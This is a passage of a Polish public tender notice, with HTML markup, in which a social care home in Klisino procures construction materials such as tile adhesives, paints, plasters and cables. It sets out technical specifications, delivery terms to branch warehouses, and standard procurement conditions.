klejowaNorma / klasa C2TEopak 25 kg zaprawa do płytek ceramicznych, gresowych, z kamienia naturalnego (niewrażliwego na przebarwienia) oraz imitacji kamienia, zaprawa wzmocniona włóknami, polecana na podłogi o zwiększonym obciążeniu eksploatacyjnym, na izolacje przeciwwilgociowe i przeciwwodne- spoinowanie po 24 h.Baza :mieszanka cementów z wypełniaczami mineralnymi i modyfikatorami. Gęstość nasypowa: ok. 1,23 kg/dm3. Proporcje mieszania:6,3-6,75 l na 22,5kg7,0-7,5 l na 25 kg. Temperatura stosowania:od +5°C do +25°C. Czas wstępnego dojrzewania: ok. 5 min. Czas zużycia: do 2 godz. Wydłużony czas otwarty: przyczepność >= 0,5 N/mm2 po czasie nie krótszym niż 30 min wg EN 12004:2007 + A1:2012S pływ:<= 0,5 mm wg EN 12004:2007 + A1:2012Spoinowanie: po 24 godz. Siła wiązania jako: przyczepność początkowa: >= 1,0 N/mm2wg EN 12004:2007 + A1:2012Trwałość dla:-wysoka przyczepność po zanurzeniu w wodzie: >= 1,0 N/mm2-wysoka przyczepność po starzeniu termicznym:>= 1,0 N/mm2-wysoka przyczepność po cyklach zamrażania - rozmrażania: >= 1,0 N/mm2wg EN 12004:2007 + A1:2012 Odporność na temperaturę:od -30°C do +70°C Reakcja na ogień:klasa FWyrób zgodny z normą PN-EN 12004:2008Wyrób musi posiadać Atest Higieniczny kg	39379. Zaprawa klejąca Norma / klasa C2TES1Baza mieszanka cementów z wypełniaczami mineralnymi i modyfikatorami, posiadająca lepszą przyczepność, wyższą odkształcalność i lepsze parametry robocze, zaprawa wzmocniona włóknami, Zaprawa do płytek gresowych, ceramicznych, cementowych i kamiennych, wewnątrz i na zewnątrz,wysoka przyczepność i odkształcalność - klasa S1, na trudne podłoża: OSB, stare płytkiTemperatura aplikacji od +5°C do +25°CBaza: mieszanka cementów z wypełniaczami mineralnymi i modyfikatorami. Gęstość nasypowa: ok. 1,2 kg/dm3. Proporcje mieszania: 1,6-1,7 l wody na 5 kg 7,2-7,7 l wody na 22,5 kg 8,0-8,5 l wody na 25 kg. Temperatura stosowania: od +5°C do +25°C. Czas wstępnego dojrzewania :ok. 5 min. Czas zużycia :do 2 godz. Wydłużony czas otwarty:przyczepność >= 0,5 N/mm2 po czasie nie krótszym niż 30 min wg EN 12004:2007 + A1:2012Spływ:<= 0,5 mm wg EN 12004:2007 + A1:2012. Kleje odkształcalne :odkształcenie poprzeczne >= 2,5 mm i < 5 mm wg EN 12004:2007 + A1:2012. Spoinowanie: po 24 godz. Siła wiązania jako :wysoka przyczepność początkowa: >= 1,0 N/mm2wg EN 12004:2007 + A1:2012Trwałość dla:-wysoka przyczepność po zanurzeniu w wodzie: >= 1,0 N/mm2-wysoka przyczepność po starzeniu termicznym:>= 1,0 N/mm2-wysoka przyczepność po cyklach zamrażania - rozmrażania: >= 1,0 N/mm2wg EN 12004:2007 + A1:2012. Odporność na temperaturę :od -30°C do +70°CReakcja na ogień :klasa F wg EN 12004:2007 + A1:2012Wyrób musi posiadać Atest Higieniczny	kg	4480. Farba olejowa do gruntowania biała	l	181. Farba olejna nawierzchniowa biała	l	182. Farba emulsyjna lateksowa kolor wysokiej jakości, odporna na szorowanie i wielokrotne zmywanie zabrudzenia, charakteryzująca się doskonałym kryciem, minimalna wydajność 12 m2/L przy jednokrotnym malowaniu, zapewniajaca ,,oddychanie"kolor do uzgodnienia	l	23283. Pianka poliuretanowa niskoprężna 750ml	szt	1084. Uchwyt do rur z PE o śr. 20 mm	szt.	24585. Uchwyt do rur z PE o śr. 25 mm	szt.	7386. Uchwyty do rur z PE o śr. 32 mm szt.	6787. kołki rozporowe średnica 8mm długość 6 cm i 8 cm	szt.	38488. Izolacja opakowanie 10 kgjednoskładnikowy, elastyczny materiał na bazie poliuretanu pozwalający na wykonanie warstwy izolacji przeciwwodnej i układanie płytek ceramicznych zarówno na zewnątrz na balkonach, tarasach, loggiach, jak również w pomieszczeniach mokrych, takich jak: kuchnie, łazienki czy pralnie. Może być stosowany na wielu różnych podłożach, np.: beton, zaprawa cementowa, drewno, stare płytki ceramiczne, metale.	kg	14089. ZAPRAWA TYNKARSKA KATEGORIA Zaprawa tynkarska cementowo-wapienna , mineralna zaprawa tynkarska kategorii CS II, która przeznaczona jest do wykonywania tradycyjnych prac tynkarskich wewnątrz pomieszczeń w kategoriach od 0 do IIIEN 998-1Fabrycznie przygotowana zaprawa tynkarska ogólnego przeznaczenia (GP).Przeznaczona do stosowania na ścianach, sufitach, słupach i ścianach działowych. Reakcja na ogień:klasa A1Przyczepność:>= 0,2 N/mm? - FP:AAbsorpcja wody:WC0Przepuszczalność pary wodnej:? 14/51Przewodność cieplna/ gęstość(wart. tab.) 0,83 W/mK Substancje niebezpieczne: patrz - kartacharakterystyki wyrobOpakowanie 25KGWysoka wytrzymałość: kategoria CS II (1,5÷5,0 N/mm?)	kg	215090. Wylewka betonowa klasa M20Wylewka betonowa przeznaczona do wykonywania podkładów podłogowych na bazie cementu o min. grubości 25mm oraz do napraw uszkodzonych posadzek cementowych do uzupełnień i napraw elementów betonowych oraz ubytków murowych. Wyrób mrozoodporny i przeznaczony jest do stosowania wewnątrz i na zewnątrz budynków.Wymagany atest PZH , wylewka zgodna z normą EN 13813:2002.Klasa podkładu podłogowego: EN 13813 CT-C20-F3-A22.Opakowania 25 kg.	kg	200091. Tynk maszynowy gipsowy lekki Zaprawa do maszynowego wykonywania gipsowych, gładkich, lekkich tynków wewnątrz pomieszczeń,w których wilgotność użytkowa nie przekracza 70%.Nadaje się do mechanicznego lub ręcznego wykonywania gipsowych wypraw tynkarskich pod farby lub tynki szlachetne na ścianach i stropach z bloczków z elementów ceramicznych, wapienno-piaskowych, betonowych.Czas obróbki	180 minut (do pierwszego gładzenia)Uziarnienie	0-1,2mmWytrzymałość na ściskanie	>= 2,0 N/mm2Proporcje mieszania z wodą	ok. 19,5 litra wody na 30kg suchej mieszankiProdukt zgodny z:EN 13279-1Reakcja na ogień	A1Opakowanie 25-30kg	kg	100092. Gładź gipsowa wolno twardniejącaGładź gipsowa przeznaczona jest do cienkowarstwowego szpachlowania powierzchni ścian i sufitów oraz uzupełniania w nich ubytków wewnątrz pomieszczeń. Pozwala na uzyskanie gładkiego śnieżnobiałego podłoża pod malowanie lub tapetowanie. Wolno wiążąca dzięki. Nadająca się także do spoinowania elementów gipsowych, a przede wszystkim płyt kartonowo-gipsowych z użyciem taśm zbrojących.Do zastosowania wewnątrz budynków na typowych podłożach mineralnych, takich jak: beton, tynki cementowe, cementowo-wapienne, gipsowe, gazobeton, gips szpachlowy. Maksymalna grubość jednej warstwy gładzi to 2 mm. Produkowana na bazie naturalnego anhydrytu, spoiw hydraulicznych oraz dodatków modyfikujących. Opakowanie 20kg-25 kgZastosowanie do wnętrzKolor białyMaksymalna grubość warstwy do 2mmKonsystencja sypka do rozrobienia	kg	30093. Siatka elewacyjna rolka 50-55 m? 160g/m?, Siatka z włókna szklanego	m2	550 94. Płyty z wełny mineralnej grubość 5 cm	m2 10495. Tynk elewacyjny akrylowy	kg	17196. Papa zgrzewalna gr min 5,2 mm	m2	27 97. Grunt do posadzki - betonu paroprzepuszczalny, "oddychający " nie zawiera rozpuszczalników l	2598. Płytki kamienne gres 30x30 Gat. 1/klasa 1 kolor do uzgodnienia	m2	499. Cegła budowlana pełna szt	4184100. Farba emulsyjna kolor fasadowa, silikatowo-silikonowa kolor do uzgodnienia	l.	139101. Zaprawa samopoziomująca (2-20mm) Samoczynnie wygładzająca się zaprawa do wyrównywania podkładów pod posadzki oraz do wylewania posadzek - worek 25kg	kg	660102. Zaprawa klejowa do wełny mineralnej kg	962103. Przewód kabel okrągły, prądowy YDY 3x1,5mm?	m	82104. Przewód kabel okrągły, prądowy YDY 3x2,5mm?	m	65105. Puszka instalacyjna podtynkowa pojedyncza o śr. 60mm głęboka do ściany	szt	12106. Płyta gipsowo-kartonowa zielona 60x120 12,5mm	szt	30107. Silikon sanitarny biały 310 ml	szt	20108. Silikon akrylowy biały 310ml	szt	20109. Styropian elewacyjny grafit z frezem lambda 0,031	m2	1001.Przedmiot zamówienia będzie realizowany sukcesywnie w asortymencie i ilościach wynikających z zapotrzebowań składanych bezpośrednio przez Zamawiającego.2. Podane w ofercie ceny będą stałe przez okres trwania umowy z zastrzeżeniem zmiany stawek podatku VAT na podstawie obowiązujących przepisów prawnych w tym zakresie. Zmianie ulegnie kwota podatku VAT, a co za tym idzie cena brutto, natomiast cena netto pozostanie niezmieniona.3. Podana szacunkowa ilość zapotrzebowania na materiały w SIWZ oraz w formularzu ofertowym nie jest ilością stałą, może być zwiększana lub zmniejszana według potrzeb Zamawiającego. 4. Zamawiający może jednostronnie zwiększyć wielkość przedmiotu zamówienia maksymalnie o 30% ogólnej wartości oferty netto Wykonawcy (jeżeli występują pakiety dotyczy to każdego z nich osobno). Z tego względu Wykonawcy nie przysługują wobec Zmawiającego jakiekolwiek roszczenia, w tym odszkodowawcze.5. Zamawiający określa minimalną wielkość przedmiotu zamówienia jaka zostanie zrealizowana na poziomie 30% ogólnej wartości oferty netto Wykonawcy (jeżeli występują pakiety dotyczy to każdego z nich osobno). Z tego względu Wykonawcy nie przysługują wobec Zmawiającego jakiekolwiek roszczenia, w tym odszkodowawcze.6. Zamawiający zastrzega sobie możliwość zwiększania lub zmniejszania ilości zamawianych materiałów w poszczególnych pozycjach oferty Wykonawcy. Z tytułu zwiększania lub zmniejszania ilości zamawianych materiałów Wykonawcy nie przysługuje jakiekolwiek roszczenia, w tym odszkodowawcze. 7. Zamawiający zastrzega sobie możliwość rezygnacji z niektórych pozycji materiałów z oferty Wykonawcy. Z tytułu rezygnacji z niektórych pozycji materiałów z oferty Wykonawcy, Wykonawcy nie przysługuje jakiekolwiek roszczenia, w tym odszkodowawcze. 8. Zaoferowany przez Wykonawcę asortyment musi spełniać warunki obowiązujących norm oraz posiadać aktualne dokumenty dopuszczające go do użytku zgodnie z obowiązującymi przepisami prawa, a także ma być najwyższej jakości (gat. I, klasa I) pod względem technicznym. Wykonawca na wezwanie Zamawiającego dostarczy niezwłocznie karty charakterystyki, karty techniczne, atesty higieniczne lub inne podobne dokumenty na dostarczane materiały budowlane.9. Wykonawca zobowiązany jest do każdorazowej dostawy partii towaru w podanym terminie w formularzu ofertowym liczony od dnia złożenia zamówienia e-mailem, faksem lub pisemnie. Za dzień roboczy uważa się każdy dzień tygodnia od poniedziałku do piątku, z wyłączeniem dni ustawowo wolnych od pracy oraz dni wolnych wynikających obowiązujących Zarządzeń w Domu Pomocy Społecznej w Klisinie. 10. Wykonawca zobowiązuje się do sukcesywnego dostarczenia materiałów budowlanych określonych w formularzu ofertowym we wskazane miejsce przez Zamawiającego (łącznie z wniesieniem do magazynu Zamawiającego). Dowóz przedmiotu zamówienia nastąpi na koszt i ryzyko Wykonawcy do magazynów Zamawiającego. 11. Dostawy przyjmowane są od poniedziałku do piątku w godz. 7.30 - 14.00 przez magazyny:1) DPS w Klisinie filia w Branicach, ul. Szpitalna 18, 48-140 Branice,2) DPS w Klisinie Filia w Boboluszkach, Boboluszki 71, 48-140 Branice,3) DPS w Klisinie Filia w Radyni, Radynia 40, 48-100 Głubczyce,4) DPS w Klisinie Filia w Dzbańcach, Dzbańce, 48-140 Branice,5) DPS w Klisinie Filia w Bliszczycach, Bliszczyce 76, 48-140 Branice,6) DPS w Klisinie Filia w Głubczycach, ul. Dworcowa 10, 48-100 Głubczyce,7) DPS w Klisinie Filia w Kietrzu, ul. Plac Biskupa Konrada 1a, 48-130 Kietrz.8) DPS w Klisinie Klisino 100, 48-118 Lisięcice.12. Wykonawca oświadcza i zapewnia, że materiały budowlane będą dostarczane w oryginalnych, czystych opakowaniach producenta zabezpieczających jakość handlową, odpowiadających warunkom transportu, odbioru i przechowywania. 13. Materiały budowlane dostarczane będą w opakowaniach z oznaczeniem fabrycznym tzn. ze wskazaniem rodzaju, nazwy wyrobu, ilości, daty produkcji, terminu przydatności lub terminu minimalnej trwałości, nazwy i adresu producenta oraz będą zawierały inne oznakowania zgodne z obowiązującymi przepisami. Dostarczane materiały muszą mieć minimalny okres gwarancji 6 miesięcy od dnia dostawy.14. Zamawianie materiałów budowlanych będzie odbywało się w daniach od poniedziałku do piątku w godzinach od 07.00 do 15.00 przez osoby wskazane w załączniku Nr 6 do umowy.15. Odbiór materiałów budowlanych będzie dokonywany przez Zamawiającego (upoważnionego pracownika Zamawiającego) w jego magazynie w oparciu o złożone zamówienie na wzorze stanowiącym załącznik Nr 5 do umowy i obowiązujące wymogi zawarte w SIWZ, umowie oraz ofercie Wykonawcy.16. Przyjęcie materiałów budowlanych dokumentowane będzie sporządzeniem protokołu odbioru, na wzorze stanowiącym załącznik Nr 4 do umowy. Wraz z materiałami Wykonawca zobowiązany jest dostarczyć instrukcję montażu w języku polskim oraz dokumenty dopuszczające wyrób do wbudowania, jeżeli będą wymagane.Podstawą do wystawienia faktury VAT jest podpisany protokół odbioru materiałów budowlanych przez Zamawiającego i Wykonawcę z adnotacją bez zastrzeżeń.17.Podstawą reklamacji jest sporządzenie protokołu reklamacyjnego, którego wzór stanowi załącznik Nr 3 do umowy. Jeżeli w opisie przedmiotu zamówienia, formularzu ofertowym wskazano jakikolwiek znak towarowy, patent lub pochodzenie, źródło lub szczególny proces, który charakteryzuje produkty lub usługi dostarczane przez konkretnego Wykonawcę, lub opisano przedmiot zamówienia poprzez odniesienie do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych - należy przyjąć, że wskazane patenty, znaki towarowe, pochodzenie, źródło lub szczególny proces, który charakteryzuje te produkty lub usługi, normy, europejskie oceny techniczne, aprobaty, specyfikacje techniczne i systemy referencji technicznych określają parametry techniczne, eksploatacyjne, użytkowe, co oznacza, że Zamawiający dopuszcza złożenie oferty w tej części przedmiotu zamówienia o równoważnych parametrach technicznych, eksploatacyjnych i użytkowych. Zgodnie z art. 30 ust. 5 ustawy Prawo zamówień publicznych, Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez Zamawiającego (np. przedstawić porównanie parametrów technicznych asortymentu wymaganego przez Zamawiającego z parametrami oferowanego asortymentu itp.).</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">44111000-1</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>44190000-8</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2019-12-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"></span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">aktualny odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w rozdz. 5 ust. 14 ppkt 14.3 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że: nie otwarto jego likwidacji ani nie ogłoszono upadłości (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;Jeżeli w kraju, którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w rozdz. 5 ust. 14, ppkt 14.3 zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jej reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę i miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby z uwzględnieniem terminów ich ważności. W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej"></span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące 